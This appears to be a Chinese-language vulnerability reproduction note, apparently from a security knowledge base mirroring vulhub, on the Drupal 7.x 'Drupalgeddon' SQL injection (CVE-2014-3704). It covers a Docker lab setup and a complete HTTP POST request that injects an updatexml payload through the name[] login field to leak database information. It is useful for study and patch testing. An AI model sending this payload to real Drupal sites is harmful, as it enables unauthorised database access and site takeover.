menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 037-Drupal chevron_right 001-CVE-2014-3704 Drupal _ 7.32 “Drupalgeddon” sql注入漏洞.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    001-CVE-2014-3704 Drupal _ 7.32 “Drupalgeddon” sql注入漏洞.md
    1.41 KB / 2021-07-17 00:01:22
        # CVE-2014-3704 Drupal < 7.32 “Drupalgeddon” sql注入漏洞
    
    ### 一、漏洞简介
    
    Drupal 是一款用量庞大的CMS,其7.0~7.31版本中存在一处无需认证的SQL漏洞。通过该漏洞,攻击者可以执行任意SQL语句,插入、修改管理员信息,甚至执行任意代码。
    
    ### 二、漏洞影响
    
    Drupal 7.0~7.31
    
    ### 三、复现过程
    
    **漏洞环境**
    
    执行如下命令启动Drupal 7.31环境:
    
    
    ```bash
    docker-compose up -d
    ```
    
    环境启动后,访问`http://your-ip:8080`即可看到Drupal的安装页面,使用默认配置安装即可。
    
    其中,Mysql数据库名填写drupal,数据库用户名、密码为root,地址为mysql:
    
    ![](images/15889984376341.png)
    
    
    安装完成后,访问首页:
    
    ![](images/15889984470917.png)
    
    
    **漏洞复现**
    
    该漏洞无需认证,发送如下数据包即可执行恶意SQL语句:
    
    
    ```bash
    POST /?q=node&destination=node HTTP/1.1
    Host: your-ip:8080
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 120
    
    pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0,concat(0xa,user()),0)%23]=bob&name[0]=a
    ```
    
    可见,信息已被爆出:
    
    ![](images/15889984675897.png)
    
    
    参考链接
    
    https://vulhub.org/#/environments/drupal/CVE-2014-3704/
    
    links
    file_download